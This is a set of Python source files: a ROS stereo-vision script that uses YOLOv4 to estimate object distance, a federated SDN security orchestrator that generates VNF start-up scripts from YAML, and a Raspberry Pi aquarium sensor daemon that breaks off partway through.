CAM_SYNC_THRESH = 0.001 * 50  # microseconds
BLOB_SIZE = 32 * 13  # blob sizes have to be multiples of 32. Size vs Accuracy tradeoff (size up = system lag)
FOCAL_LENGTH = 35.90984  # 0.03590984 # 35.90984 mm
BASELINE = 0.75  # 0.75 m

### PHYSICAL CAMERA PARAMETERS ###
"""
Unity Physical Camera Parameters
FOV: 52.7595 H, 39.2228 V (Degrees)
Focal Length: 35.90984 (mm)
Sensor Size: 35.62mm x, 25.59mm y
Gate Fit: None
Lens Shift: 0X, 0Y
Resolution: 720x576
Baseline = 0.75m
"""
### PHYSICAL CAMERA PARAMETERS ###


def bino_instance_classifier(left_objects, right_objects):
    """Match detections between the two eyes and estimate their distance.

    :param left_objects: [image np.array, [[x top, y left, width, height] for each classified item]]
    :param right_objects: [image np.array, [[x top, y left, width, height] for each classified item]]
    :return: list of instances and their distances
    I'm sorry... the inputs are a bit confusing
    """
    # Left camera frame is considered reference (master) and right camera is
    # considered target (slave).
    instances = []
    if len(left_objects[1]) > 0 and len(right_objects[1]) > 0:  # if there are identified objects in both frames
        left_centroid_point = left_objects[1][:, 0:2]  # strip centroid position from all objects
        right_centroid_point = right_objects[1][:, 0:2]
        # Matrix of euclidean distances from each left-eye object to each
        # right-eye object.
        centroid_euclidean_distances = dist.cdist(left_centroid_point, right_centroid_point, metric='euclidean')
        for reference_index, row in enumerate(centroid_euclidean_distances):  # for each object in the left frame
            target_index = row.argmin()  # find object with minimum distance to reference frame object
            # check if object width/height are within 15% of each other
            size_match = isclose(left_objects[1][reference_index, 2], right_objects[1][target_index, 2], rel_tol=0.15) \
                and isclose(left_objects[1][reference_index, 3], right_objects[1][target_index, 3], rel_tol=0.15)
            # Category has to match too
            category_match = True if left_objects[1][reference_index, 4] == right_objects[1][target_index, 4] else False
            if size_match and category_match:  # instance match found
                # Calculate distance based off of centroid disparity
                # (baseline * focal length / horizontal disparity).
                left_params = left_objects[1][reference_index]
                right_params = right_objects[1][target_index]
                # NOTE(review): divides by (xL - xR) with no zero/negative
                # disparity guard; the *10 scale presumably converts units —
                # TODO confirm against camera calibration.
                distance = ((BASELINE * FOCAL_LENGTH) / (left_params[0] - right_params[0])) * 10
                instances.append([left_params[0], left_params[1],
                                  right_params[0], right_params[1],
                                  left_params[4], round(distance, 2)])
    return instances  # return list of instances, including centroid position and class


def read_buffer(dnn_net, output_layer, pub, msg):
    """Main worker loop: drain camera buffers, run the DNN on both eyes,
    match instances, publish distances and show the annotated frames.

    Runs until KILL_THREADS is set. reads the input camera feed, passes the
    frames through the neural network, instance classifies, then calculates
    distance.
    """
    global frame_buffer_left, frame_buffer_right, dnn_buffer_left, dnn_buffer_right
    while not KILL_THREADS:
        # pull frames from camera buffers if both buffers have frames and
        # their capture time is within the limit
        # (will need shutter sync in a real-time system)
        if frame_buffer_left.qsize() > 0 and frame_buffer_right.qsize() > 0:
            left_image = frame_buffer_left.get()
            right_image = frame_buffer_right.get()
            dif = abs(left_image[1].to_sec() - right_image[1].to_sec())
            if dif < CAM_SYNC_THRESH:
                # push both input frames through the dnn, one subprocess per eye
                left_thread = multiprocessing.Process(name="left process", target=dnn_computation,
                                                      args=(dnn_net, output_layer, left_image[0], True,))
                right_thread = multiprocessing.Process(name="right process", target=dnn_computation,
                                                       args=(dnn_net, output_layer, right_image[0], False,))
                left_thread.start()
                right_thread.start()
                # ^ assure both processes are completed before continuing
                # (process synchronization)
                # NOTE(review): the processes are never join()ed; the qsize()
                # check below only sees results from *earlier* iterations, so
                # left/right results may pair across frames — verify intent.
                if dnn_buffer_left.qsize() > 0 and dnn_buffer_right.qsize() > 0:  # if both frames have returned classified objects
                    process_return_left = dnn_buffer_left.get()
                    process_return_right = dnn_buffer_right.get()
                    # classify instances (e.g. match the cars seen in the left
                    # eye with the car in the right eye)
                    instance = bino_instance_classifier(process_return_left, process_return_right)
                    if len(instance) > 0:
                        # TODO publish to topic
                        for d in instance:
                            msg.object = d[4]  # class
                            msg.distance = d[5]  # duh
                            msg.lefteye = []  # centroid left
                            msg.lefteye = [int(d[0]), int(d[1])]
                            msg.righteye = []  # centroid right
                            msg.righteye = [int(d[2]), int(d[3])]
                            pub.publish(msg)
                            # Annotate both eyes with the estimated distance.
                            dist_text = str(d[5])
                            cv2.putText(process_return_left[0], dist_text, (d[0], d[1]),
                                        cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 0), 2)
                            cv2.putText(process_return_right[0], dist_text, (d[2], d[3]),
                                        cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 0), 2)
                    # Side-by-side left|right debug view.
                    gui_output = np.concatenate((process_return_left[0], process_return_right[0]), axis=1)
                    cv2.imshow("Stereo Vision Distance Measuring - YOLOv4 - Instance Classification - Distance Measuring",
                               gui_output)
                    cv2.waitKey(1)
            else:
                print(Fore.YELLOW + "Frame skipped, sync difference: " + Style.RESET_ALL + str(dif) + "s")
            # Queue depth diagnostics for tuning FRAME_INTERVAL / buffer sizes.
            print("input left: " + str(frame_buffer_left.qsize()) + "dnn left: " + str(dnn_buffer_left.qsize()))
            print("input right: " + str(frame_buffer_right.qsize()) + "dnn right: " + str(dnn_buffer_right.qsize()))


def dnn_computation(yolo_net, layer_names, frame, LR):
    """Run one frame through the YOLO network (executed in a subprocess).

    LR selects the output queue: True -> left eye, False -> right eye.
    NOTE(review): put(..., timeout=3) raises queue.Full when the consumer
    stalls, killing the subprocess silently — confirm that is acceptable.
    """
    pre_process = cv2.dnn.blobFromImage(frame, 1 / 255.0, (BLOB_SIZE, BLOB_SIZE), swapRB=False, crop=False)
    yolo_net.setInput(pre_process)
    output_yolo = yolo_net.forward(layer_names)  # Alternative could be considered (causes lag with large blob size)
    queue_frame, objects = frame_class_drawer(output_yolo, frame)
    if LR:
        dnn_buffer_left.put([queue_frame, objects], timeout=3)
    else:
        dnn_buffer_right.put([queue_frame, objects], timeout=3)


def load_dnn_yolo():
    """Load the Darknet YOLOv4 network into OpenCV's DNN module; prep DNN for use.

    Returns (network, output_layer_names).
    """
    # NOTE(review): FRAME_TIME_LEFT and FRAM are declared global but never
    # assigned or used anywhere visible — looks like a truncated leftover;
    # confirm and remove.
    global CATEGORIES, CATEGORIES_COLORS, FRAME_TIME_LEFT, FRAM
    CATEGORIES = open(yolo_names).read().strip().split("\n")  # Pull labels from .names file
    CATEGORIES_COLORS = np.random.randint(0, 255, size=(len(CATEGORIES), 3), dtype="uint8")  # assign unique color
    YOLOV4_NET = cv2.dnn.readNetFromDarknet(yolo_config, yolo_weights)
    # NOTE(review): the i[0] indexing assumes getUnconnectedOutLayers()
    # returns Nx1 arrays — true for older OpenCV; newer releases return a
    # flat array. Verify against the pinned OpenCV version.
    OUTPUT_LAYER_NAMES = [YOLOV4_NET.getLayerNames()[i[0] - 1] for i in YOLOV4_NET.getUnconnectedOutLayers()]
    # return DNN object and layer names of output layers
    return YOLOV4_NET, OUTPUT_LAYER_NAMES


def left_callback(msg, args):
    """ROS callback for the left camera: decompress and buffer every
    (FRAME_INTERVAL+1)-th frame together with its capture timestamp.

    args[0] is the shared CvBridge instance.
    """
    global frame_buffer_left, left_count
    if (left_count > FRAME_INTERVAL):
        left_count = 0
        left_decompressed = args[0].imgmsg_to_cv2(msg)  # convert to OpenCV MAT format using cv_bridge
        try:
            buff_error = frame_buffer_left.put([left_decompressed, msg.header.stamp], timeout=3)
        except queue.Full:
            print(Fore.RED + "Left eye buffer is full" + Style.RESET_ALL)
    else:
        left_count = left_count + 1


def right_callback(msg, args):
    """Same as left_callback but for the right camera."""
    global frame_buffer_right, right_count
    if (right_count > FRAME_INTERVAL):
        right_count = 0
        right_decompressed = args[0].imgmsg_to_cv2(msg)
        try:
            buff_error = frame_buffer_right.put([right_decompressed, msg.header.stamp], timeout=3)
        except queue.Full:
            print(Fore.RED + "Right eye buffer is full" + Style.RESET_ALL)
    else:
        right_count = right_count + 1


def frame_class_drawer(output_yolo, frame):
    """Convert raw YOLO output into NMS-filtered detections and draw the boxes.

    Returns (annotated frame, np.array of [centerX, centerY, w, h, label]).
    """
    global CATEGORIES, CATEGORIES_COLORS
    boxes = []
    confidences = []
    classIDs = []
    objects = []
    nms_objects = []
    for output in output_yolo:
        for instance in output:
            # extract the class ID and confidence (i.e., probability) of
            # the current object detection
            scores = instance[5:]
            classID = np.argmax(scores)
            confidence = scores[classID]
            # filter out weak predictions by ensuring the detected
            # probability is greater than the minimum probability
            if confidence > MIN_CONFIDENCE:  # min_confidence:
                # scale the bounding box coordinates back relative to the
                # size of the image, keeping in mind that YOLO actually
                # returns the center (x, y)-coordinates of the bounding
                # box followed by the boxes' width and height
                box = instance[0:4] * np.array([FRAME_WIDTH, FRAME_HEIGHT, FRAME_WIDTH, FRAME_HEIGHT])  # TODO make W and H automatic
                (centerX, centerY, width, height) = box.astype("int")
                # use the center (x, y)-coordinates to derive the top and
                # and left corner of the bounding box
                x = int(centerX - (width / 2))
                y = int(centerY - (height / 2))
                roi_limit = np.shape(frame)  # NOTE(review): unused — dead local?
                # update our list of bounding box coordinates, confidences,
                # and class IDs
                boxes.append([x, y, int(width), int(height)])
                confidences.append(float(confidence))
                classIDs.append(classID)
                classification = CATEGORIES[classID]
                objects.append(np.array([centerX, centerY, width, height, classification], dtype=object))
    # Non-maximum suppression: 0.3 is the NMS overlap threshold.
    idxs = cv2.dnn.NMSBoxes(boxes, confidences, MIN_CONFIDENCE, 0.3)
    if len(idxs) > 0:
        # loop over the indexes we are keeping
        for i in idxs.flatten():
            # extract the bounding box coordinates
            (x, y) = (boxes[i][0], boxes[i][1])
            (w, h) = (boxes[i][2], boxes[i][3])
            # draw a bounding box rectangle and label on the image
            color = [int(c) for c in CATEGORIES_COLORS[classIDs[i]]]
            cv2.rectangle(frame, (x, y), (x + w, y + h), color, 2)
            text = "{}: {:.4f}".format(CATEGORIES[classIDs[i]], confidences[i])
            cv2.putText(frame, text, (x, y - 5), cv2.FONT_HERSHEY_SIMPLEX, 0.5, color, 2)
            nms_objects.append(objects[i])
    return frame, np.asarray(nms_objects)
    # Pulled from: https://www.pyimagesearch.com/2018/11/12/yolo-object-detection-with-opencv/


def boot_print():
    """Print the ASCII-art startup banner."""
    print('''
██╗   ██╗ ██████╗ ██╗      ██████╗
╚██╗ ██╔╝██╔═══██╗██║     ██╔═══██╗
 ╚████╔╝ ██║   ██║██║     ██║   ██║
  ╚██╔╝  ██║   ██║██║     ██║   ██║
   ██║   ╚██████╔╝███████╗╚██████╔╝
   ╚═╝    ╚═════╝ ╚══════╝ ╚═════╝
██████╗ ██╗███╗   ██╗ ██████╗
██╔══██╗██║████╗  ██║██╔═══██╗
██████╔╝██║██╔██╗ ██║██║   ██║
██╔══██╗██║██║╚██╗██║██║   ██║
██████╔╝██║██║ ╚████║╚██████╔╝
╚═════╝ ╚═╝╚═╝  ╚═══╝ ╚═════╝
 ██████╗██╗   ██╗
██╔════╝██║   ██║
██║     ██║   ██║
██║     ╚██╗ ██╔╝
╚██████╗ ╚████╔╝
 ╚═════╝  ╚═══╝
''')


def kill_all_threads():
    """Flip the KILL_THREADS flag and hold (2 s), ensuring multithreading shutdown."""
    global KILL_THREADS
    KILL_THREADS = True
    time.sleep(2)
    print("Killing threads...")


if __name__ == '__main__':
    try:
        boot_print()
        net, output_layer = load_dnn_yolo()  # Prep and gather DNN object and output layers
        ros_bridge_cv = CvBridge()  # Create cv_bridge object for converting images to MAT format
        # publisher to custom message
        bino_pub = rospy.Publisher('vision_object', Vision_Object, queue_size=5)
        bino_msg = Vision_Object()
        # create thread to read incoming image buffers
        read_buffer_thread = threading.Thread(target=read_buffer, args=(net, output_layer, bino_pub, bino_msg))
        read_buffer_thread.start()  # start reading from buffers
        atexit.register(kill_all_threads)  # will help catch any un-killed threads
        rospy.init_node('binocular_measurement')  # create node for ROS
        # subscribe to both cameras
        left_cam = rospy.Subscriber('binocular_cv/left/normal', Image, left_callback, (ros_bridge_cv, read_buffer_thread))
        right_cam = rospy.Subscriber('binocular_cv/right/normal', Image, right_callback, (ros_bridge_cv, read_buffer_thread))
        print ("try========================================================================================")
        rospy.spin()
    except:
        # kills threads in event of error
        # NOTE(review): bare except also swallows SystemExit/KeyboardInterrupt.
        print ("except==========================================================================================")
        traceback.print_exc()
        kill_all_threads()
    finally:
        # kills threads in event of proper shutdown
        print ("finally==========================================================================================")
        kill_all_threads()
FederatedSDNSecurity.py
'''
Created on 12 janv. 2016

@author: phm

Federated SDN security orchestrator (Python 2): tracks per-segment security
agents, queries their VNFs/protocols, and generates Python start-up scripts
for VNFs/VMs described in a YAML topology file.
'''
# --------------------------------------
import yaml
import FederatedSDNAdapter
import random


class FederatedSDNSecurity:
    '''
    classdocs

    Holds a named collection of security agents plus an SDN adaptor used to
    resolve the security VNFs attached to a network segment.
    '''

    def __init__(self, name):
        '''
        Constructor
        '''
        self.name=name
        self.secAgents=[]           # security agents registered via addSecurityAgent
        self.sdnAdaptor=FederatedSDNAdapter.FederatedSDNAdapter("")

    def getName(self):
        # Name given at construction time.
        return self.name

    def addSecurityAgent(self, secAgent):
        # Register one security agent with this orchestrator.
        self.secAgents.append(secAgent)

    def getListOfSecurityVNF_all(self):
        # Concatenate the security-VNF lists of every registered agent.
        listOfVNF=[]
        secAg=""
        for secAg in self.secAgents:
            listOfVNF=listOfVNF+secAg.getListOfSecurityVNF()
        return listOfVNF

    def getListOfSecurityVNF_networkSegment(self, network_segment_id):
        # Delegate the per-segment VNF lookup to the SDN adaptor.
        #print "network_segment_id is", network_segment_id
        securityVNF=self.sdnAdaptor.getListOfSecurityVNF_networkSegment(network_segment_id)
        return securityVNF

    def getListOfSecurityVNF(self, fedAgent):
        # VNFs of one specific federated agent.
        return fedAgent.getListOfSecurityVNF()

    def getListOfCommunicationProtocols(self, fedAgent):
        # Communication protocols of one specific federated agent.
        return fedAgent.getListOfCommunicationProtocols()

    def getListOfCommunicationProtocolsAll(self):
        # Concatenate the protocol lists of every registered agent.
        commProtocols=[]
        secAg=""
        for secAg in self.secAgents:
            commProtocols=commProtocols+secAg.getListOfCommunicationProtocols()
        return commProtocols

    def getListOfCommunicationProtocols_networkSegment(self, network_segment_id):
        # Protocols of the agents whose segment list equals [network_segment_id].
        # NOTE(review): compares against a one-element list — agents on
        # multiple segments will never match; confirm intended.
        secAg=""
        communicationProtocols=[]
        for secAg in self.secAgents:
            if (secAg.getNetworkSegment()==[network_segment_id]):
                communicationProtocols=communicationProtocols+secAg.getListOfCommunicationProtocols()
        return communicationProtocols

    # --------------------------------------
    def startVNFOnNetworkSegment(self, network_segment_id, vnf, configuration):
        # Ask every agent that owns exactly this segment to start the VNF.
        secAg=""
        for secAg in self.secAgents:
            #print "secAg.getNetworkSegment()", secAg.getNetworkSegment()
            if (secAg.getNetworkSegment()==[network_segment_id]):
                secAg.startVNF(vnf, configuration)

    def readYAMLfile(self, fileName):
        # Parse the YAML topology and, for each VNF/VM entry, start it on its
        # segment and generate a per-identifier Python start-up script into
        # outputFolder. ENCRYPT/DECRYPT entries get SSL listener+writer glue;
        # LISTENER/WRITER VMs get their respective halves; "startup-order"
        # produces a multiprocessing launcher for the whole chain.
        incomingIP=""
        incomingPort=""
        incomingPrivateKeyFile=""
        incomingPublicKeyFile=""
        outgoingIP=""
        outgoingPort=""
        outgoingPublicKeyFile=""
        identifier=""
        #outputFolder="C:\Users\phm\workspace\Federated SDN Security POC2\src\GeneratedCode"
        #outputFolder="/Users/phm/git/federated-sdn-security-poc/src/GeneratedCode"
        outputFolder="../GeneratedCode"
        #print "Begin readYAMLfile"
        with open(fileName, 'r') as stream:
            try:
                # NOTE(review): yaml.load without a Loader executes arbitrary
                # tags — unsafe on untrusted input; yaml.safe_load recommended.
                yamlObject=yaml.load(stream)
                #print yamlObject
            except yaml.YAMLError as exc:
                print(exc)
        for data in yamlObject.items():
            #print data
            key=""
            vnf_network_segment="none"
            vnf_type=""
            cloudManagerId=""
            # data is a (key, value) pair; the loop sees the key first, then
            # the value — "key=item" at the bottom carries the key over.
            for item in data:
                #print item
                if (key=="clouds"):
                    for cloudId in item.items():
                        for clouds in cloudId[1].items():
                            #print clouds
                            if (clouds[0]=="CloudManager"):
                                #print clouds[0], ":", clouds[1]
                                cloudManagerId=clouds[1]
                            elif (clouds[0]=="Network_segment"):
                                #print clouds[0], ":", clouds[1]
                                pass
                            elif (clouds[0]=="VNF"):
                                for VNFS in clouds[1].items():
                                    #print VMs[0]
                                    for VNF in VNFS[1].items():
                                        if (VNF[0]=="vnf_type"):
                                            vnf_type=VNF[1]
                                        elif (VNF[0]=="identifier"):
                                            identifier=VNF[1]
                                        elif (VNF[0]=="network_segment"):
                                            vnf_network_segment=VNF[1]
                                            # NOTE(review): start is triggered
                                            # here, so it depends on the YAML
                                            # key order (vnf_type must have
                                            # been seen already) — confirm.
                                            self.startVNFOnNetworkSegment(vnf_network_segment, VNFS[0], vnf_type)
                                            print VNFS[0], "started on", vnf_network_segment, "with type", vnf_type
                                        elif (VNF[0]=="incomingIP"):
                                            incomingIP=VNF[1]
                                            print "incomingIP : " + VNF[1]
                                        elif (VNF[0]=="incomingPort"):
                                            incomingPort=VNF[1]
                                            print "incomingPort : " + VNF[1]
                                        elif (VNF[0]=="incomingPrivateKeyFile"):
                                            incomingPrivateKeyFile=VNF[1]
                                            print "incomingPrivateKeyFile : " + VNF[1]
                                        elif (VNF[0]=="incomingPublicKeyFile"):
                                            incomingPublicKeyFile=VNF[1]
                                            print "incomingPublicKeyFile : " + VNF[1]
                                        elif (VNF[0]=="outgoingIP"):
                                            outgoingIP=VNF[1]
                                            print "outgoingIP : " + VNF[1]
                                        elif (VNF[0]=="outgoingPort"):
                                            outgoingPort=VNF[1]
                                            print "outgoingPort : " + VNF[1]
                                        elif (VNF[0]=="outgoingPublicKeyFile"):
                                            outgoingPublicKeyFile=VNF[1]
                                            print "outgoingPublicKeyFile : " + VNF[1]
                                    # now generate the script
                                    if (vnf_type=="ENCRYPT"):
                                        f = open(outputFolder+"//"+ identifier+".py", 'w')
                                        f.write("#---- Python VNF startup for " + identifier + "---"+"\n")
                                        f.write("import SSL_listener"+"\n")
                                        f.write("import SSL_writer"+"\n")
                                        f.write("\n")
                                        f.write("incomingIP=" + "\"" + incomingIP + "\"" + "\n")
                                        f.write("incomingPort=" + incomingPort+"\n")
                                        f.write("incomingPrivateKeyFile="+"\"" +incomingPrivateKeyFile+"\"" +"\n")
                                        f.write("incomingPublicKeyFile="+"\"" + incomingPublicKeyFile+"\"" +"\n")
                                        f.write("outgoingIP="+"\"" +outgoingIP+"\"" +"\n")
                                        f.write("outgoingPort="+outgoingPort+"\n")
                                        f.write("outgoingPublicKeyFile="+"\"" +outgoingPublicKeyFile+"\"" +"\n")
                                        f.write("\n")
                                        f.write("def " +"start"+ identifier+"():"+"\n")
                                        f.write("\t"+"ssl_writer=SSL_writer.SSL_writer(outgoingIP,outgoingPort, outgoingPublicKeyFile)"+"\n")
                                        f.write("\t"+"incoming_ssl_EncryptionVNF= SSL_listener.SSL_listener(incomingIP, incomingPort, incomingPrivateKeyFile, incomingPublicKeyFile,ssl_writer)"+"\n")
                                        f.close()
                                    elif (vnf_type=="DECRYPT"):
                                        # Same generated body as ENCRYPT; the
                                        # direction is implied by the config.
                                        f = open(outputFolder+"//"+ identifier+".py", 'w')
                                        f.write("#---- Python VNF startup for " + identifier + "---"+"\n")
                                        f.write("import SSL_listener"+"\n")
                                        f.write("import SSL_writer"+"\n")
                                        f.write("\n")
                                        f.write("incomingIP=" + "\"" + incomingIP + "\"" + "\n")
                                        f.write("incomingPort=" + incomingPort+"\n")
                                        f.write("incomingPrivateKeyFile="+"\"" +incomingPrivateKeyFile+"\"" +"\n")
                                        f.write("incomingPublicKeyFile="+"\"" + incomingPublicKeyFile+"\"" +"\n")
                                        f.write("outgoingIP="+"\"" +outgoingIP+"\"" +"\n")
                                        f.write("outgoingPort="+outgoingPort+"\n")
                                        f.write("outgoingPublicKeyFile="+"\"" +outgoingPublicKeyFile+"\"" +"\n")
                                        f.write("\n")
                                        f.write("def "+"start"+ identifier+"():"+"\n")
                                        f.write("\t"+"ssl_writer=SSL_writer.SSL_writer(outgoingIP,outgoingPort, outgoingPublicKeyFile)"+"\n")
                                        f.write("\t"+"incoming_ssl_EncryptionVNF= SSL_listener.SSL_listener(incomingIP, incomingPort, incomingPrivateKeyFile, incomingPublicKeyFile,ssl_writer)"+"\n")
                                        f.close()
                            elif (clouds[0]=="VMS"):
                                for VMs in clouds[1].items():
                                    #print VMs[0]
                                    for VNF in VMs[1].items():
                                        if (VNF[0]=="vnf_type"):
                                            vnf_type=VNF[1]
                                        elif (VNF[0]=="identifier"):
                                            identifier=VNF[1]
                                        elif (VNF[0]=="network_segment"):
                                            vnf_network_segment=VNF[1]
                                            self.startVNFOnNetworkSegment(vnf_network_segment, VMs[0], vnf_type)
                                            print VMs[0], "started on", vnf_network_segment, "with type", vnf_type
                                        elif (VNF[0]=="incomingIP"):
                                            incomingIP=VNF[1]
                                            print "incomingIP : " + VNF[1]
                                        elif (VNF[0]=="incomingPort"):
                                            incomingPort=VNF[1]
                                            print "incomingPort : " + VNF[1]
                                        elif (VNF[0]=="incomingPrivateKeyFile"):
                                            incomingPrivateKeyFile=VNF[1]
                                            print "incomingPrivateKeyFile : " + VNF[1]
                                        elif (VNF[0]=="incomingPublicKeyFile"):
                                            incomingPublicKeyFile=VNF[1]
                                            print "incomingPublicKeyFile : " + VNF[1]
                                        elif (VNF[0]=="outgoingIP"):
                                            outgoingIP=VNF[1]
                                            print "outgoingIP : " + VNF[1]
                                        elif (VNF[0]=="outgoingPort"):
                                            outgoingPort=VNF[1]
                                            print "outgoingPort : " + VNF[1]
                                        elif (VNF[0]=="outgoingPublicKeyFile"):
                                            outgoingPublicKeyFile=VNF[1]
                                            print "outgoingPublicKeyFile : " + VNF[1]
                                    # now generate the script
                                    if (vnf_type=="LISTENER"):
                                        f = open(outputFolder+"//"+ identifier+".py", 'w')
                                        f.write("#---- Python VM startup for " + vnf_type + identifier + " ---" +"\n")
                                        f.write("import SSL_listener"+"\n")
                                        f.write("\n")
                                        f.write("incomingIP=" + "\"" + incomingIP + "\"" + "\n")
                                        f.write("incomingPort=" + incomingPort+"\n")
                                        f.write("incomingPrivateKeyFile="+"\"" +incomingPrivateKeyFile+"\"" +"\n")
                                        f.write("incomingPublicKeyFile="+"\"" + incomingPublicKeyFile+"\"" +"\n")
                                        f.write("outgoingIP="+"\"" +outgoingIP+"\"" +"\n")
                                        f.write("outgoingPort="+outgoingPort+"\n")
                                        f.write("outgoingPublicKeyFile="+"\"" +outgoingPublicKeyFile+"\"" +"\n")
                                        f.write("\n")
                                        f.write("def "+"start"+ identifier+"():"+"\n")
                                        f.write("\t"+"incoming_ssl_EncryptionVNF= SSL_listener.SSL_listener(incomingIP, incomingPort, incomingPrivateKeyFile, incomingPublicKeyFile,"+ "\""+"\" )"+"\n")
                                        f.write("#-------"+"\n")
                                        f.close()
                                    elif (vnf_type=="WRITER"):
                                        # WRITER VMs poll a timestamped message
                                        # every 10 s to exercise the chain.
                                        f = open(outputFolder+"//"+ identifier+".py", 'w')
                                        f.write("#---- Python VNF startup for " + vnf_type + "---" +"\n")
                                        f.write("import SSL_writer"+"\n")
                                        f.write("import time"+"\n")
                                        f.write("\n")
                                        f.write("outgoingIP="+"\"" +outgoingIP+"\"" +"\n")
                                        f.write("outgoingPort="+outgoingPort+"\n")
                                        f.write("outgoingPublicKeyFile="+"\"" +outgoingPublicKeyFile+"\"" +"\n")
                                        f.write("\n")
                                        f.write("def "+"start"+ identifier+"():"+"\n")
                                        f.write("\t"+"ssl_writer=SSL_writer.SSL_writer(outgoingIP,outgoingPort, outgoingPublicKeyFile)"+"\n")
                                        f.write("\t"+"while True:"+"\n")
                                        f.write("\t"+"\t"+"localtime=time.localtime(time.time())"+"\n")
                                        f.write("\t"+"\t"+"message= \"message from " + identifier + " \"" + " + " + " time.asctime(localtime)"+"\n")
                                        f.write("\t"+"\t"+"ssl_writer.writeMessage(message)"+"\n")
                                        f.write("\t"+"\t"+"time.sleep(10)"+"\n")
                                        f.close()
                            elif (clouds[0]=="OutgoingChaining"):
                                # Pretty-print the outgoing chain as "a seq b seq c".
                                chainingstr=""
                                for chaining in clouds[1].items():
                                    for chainedVNF in chaining[1]:
                                        if (chainingstr==""):
                                            chainingstr=chainedVNF
                                        else:
                                            chainingstr=chainingstr+" seq "+ chainedVNF
                                    print chaining[0], ":", chainingstr
                                # get the cloud manager and VNF manager
                            elif (clouds[0]=="IncomingChaining"):
                                chainingstr=""
                                for chaining in clouds[1].items():
                                    if (chaining[0]=="in_chaining"):
                                        for chainedVNF in chaining[1]:
                                            if (chainingstr==""):
                                                chainingstr=chainedVNF
                                            else:
                                                chainingstr=chainingstr+" seq "+ chainedVNF
                                        print chaining[0], ":", chainingstr
                                    elif (chaining[0]=="startup-order"):
                                        # Generate a launcher that imports each
                                        # chained VNF module and starts it in
                                        # its own process, 5 s apart, then
                                        # joins them all.
                                        print "parsing startup-order"
                                        #f = open(outputFolder+"\\"+ self.cloudId + "VNF-startup"+".py", 'w')
                                        #f.write("#---- Python VM startup for " + self.cloudId + " ---" +"\n")
                                        f = open(outputFolder+"//"+ "start-VNF-"+chaining[1][0] +".py", 'w')
                                        f.write("#---- Python VM startup for " + chaining[1][0] + " ---" +"\n")
                                        f.write("import multiprocessing"+"\n")
                                        f.write("import time"+"\n")
                                        for chainedVNF in chaining[1]:
                                            f.write("import " + chainedVNF + "\n")
                                        f.write("\n")
                                        f.write("processes = []"+"\n")
                                        f.write("\n")
                                        f.write("if __name__ == '__main__':"+"\n")
                                        for chainedVNF in chaining[1]:
                                            f.write("\t"+"p = multiprocessing.Process(target="+chainedVNF+"."+"start"+chainedVNF+")"+"\n")
                                            f.write("\t"+"processes.append(p)"+"\n")
                                            f.write("\t"+"p.start()"+"\n")
                                            f.write("\t"+"print \"started "+ chainedVNF+ "\""+"\n")
                                            f.write("\t"+"time.sleep(5)"+"\n")
                                        f.write("\n")
                                        f.write("\t"+"for p in processes:"+"\n")
                                        f.write("\t"+"\t"+"p.join()"+"\n")
                                        f.close()
                            elif (clouds[0]=="SecurityGroup"):
                                secItem=""
                                for secItem in clouds[1].items():
                                    #print secItem
                                    #for secItem in secGroupStr.items():
                                    if (secItem[0]=="id"):
                                        secGroupId= secItem[1]
                                    elif (secItem[0]=="members"):
                                        secGroupMembers= secItem[1]
                                print "security group:", secGroupId, "members:", secGroupMembers
                            elif (clouds[0]=="AuthorizedProtocols"):
                                # Pretty-print authorized protocols as "a , b".
                                chainingstr=""
                                for chaining in clouds[1].items():
                                    for chainedVNF in chaining[1]:
                                        if (chainingstr==""):
                                            chainingstr=chainedVNF
                                        else:
                                            chainingstr=chainingstr+" , "+ chainedVNF
                                    print "Authorized protocols", ":", chainingstr
                elif (key=="configuration"):
                    print key, ":", item
                key=item

    def readYAMLfileV2(self, fileName):
        # Debug helper: load the YAML file and dump its top-level items.
        with open(fileName, 'r') as stream:
            try:
                yamlObject=yaml.load(stream)
                #print yamlObject
                print "load:"
                print yamlObject.items()
                print "parse:"
                #for event in yaml.parse(stream):
                #    print event
                #yaml.compose(stream)
            except yaml.YAMLError as exc:
                print(exc)

    def verifySecurityPolicy(self, fedSDN):
        # Print the VNFs and (placeholder) chaining info of every segment in
        # the hard-coded federation "FedCloudNetwork_1".
        print "network segments for", "FedCloudNetwork_1", "are", fedSDN.getNetworkFederationSegments("FedCloudNetwork_1")
        network_segments=fedSDN.getNetworkFederationSegments("FedCloudNetwork_1")
        network_segment=""
        for network_segment in network_segments:
            print "VNF for ", network_segment, "are", self.getListOfSecurityVNF_networkSegment(network_segment)
            print "IncomingChaining for", network_segment, "is", ""
            print "OutgoingChaining for", network_segment, "is", ""
sensors.py
#!/usr/bin/env python
# Aquarium monitoring daemon (Python 2, Raspberry Pi):
#   - pH probe over serial (Atlas-style "L,1"/"C,1" commands)
#   - DS18B20 temperature via the w1 sysfs interface
#   - sump water level via an HC-SR04-style ultrasonic sensor on GPIO
# Latest readings are kept in row id=1 of the sqlite "tank" table and pushed
# to an RRD database every 10 s for graphing.
import serial
import os
import glob
import time
import RPi.GPIO as GPIO
import sqlite3
import threading
import subprocess
import sys
sys.path.append('/opt/rrdtool-1.4.3/lib/python2.7/site-packages/')
import rrdtool
config = "/data/config.py"
# Pulls db_location, db_history, rrd_db and the GPIO pin constants into scope.
from config import *

global x
x = 0  # shared "keep running" sentinel; loops run while x < 100
print "SENSOR PROGRAM STARTED\n"
usbport = '/dev/ttyAMA0'  # **PH**
ser = serial.Serial(usbport, 9600)  # **PH**
os.system('modprobe w1-gpio')  # **TEMP**
os.system('modprobe w1-therm')  # **TEMP**
base_dir = '/sys/bus/w1/devices/'  # **TEMP**
device_folder = glob.glob(base_dir + '28*')[0]  # **TEMP** first DS18B20 found
device_file = device_folder + '/w1_slave'  # **TEMP**
GPIO.setmode(GPIO.BCM)  # **DISTANCE**
# turn on the LEDs
ser.write("L,1\r")  # **PH**
ser.write("C,1\r")  # **PH**
global distance  # **DISTANCE*
GPIO.setup(GPIO_OUT_sumptrig, GPIO.OUT)  # **DISTANCE*
GPIO.setup(GPIO_IN_sumpecho, GPIO.IN)  # **DISTANCE*
# Latest values shared between the sensor threads and rrdloop.
global phrrd
global temprrd
global sumprrd

try:
    hotconn = sqlite3.connect(
        db_location, check_same_thread=False)
    print "CONNECTED TO hot.db"
except:
    # NOTE(review): bare except leaves hotconn undefined on failure; later
    # code will then raise NameError.
    print "COULD NOT CONNECT TO HOT DATABASE"
try:
    histconn = sqlite3.connect(
        db_history, check_same_thread=False)
    print "CONNECTED TO history.db"
except:
